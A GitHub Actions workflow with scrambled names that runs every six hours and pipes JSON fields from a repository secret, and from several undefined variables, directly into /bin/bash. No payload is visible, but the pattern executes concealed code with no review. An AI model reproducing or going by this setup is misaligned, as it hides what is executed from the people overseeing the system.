name: lijun19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '25 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lijun19871010
        env:
          yweq20: ${{ secrets.yweq20 }}
        run: |
          echo $yweq20 | jq -r .p1 | /bin/bash
          echo $tha3 | jq -r .e8413 | /bin/bash
          echo $fp021 | jq -r .vzqh36 | /bin/bash
          echo $ni3 | jq -r .url44738 | /bin/bash
          echo $slys450 | jq -r .kv6 | /bin/bash
          echo $motgn03 | jq -r .jilw8083 | /bin/bash
          echo $jkexb98320 | jq -r .yme4235 | /bin/bash
          echo $xamlv07 | jq -r .yul5187 | /bin/bash

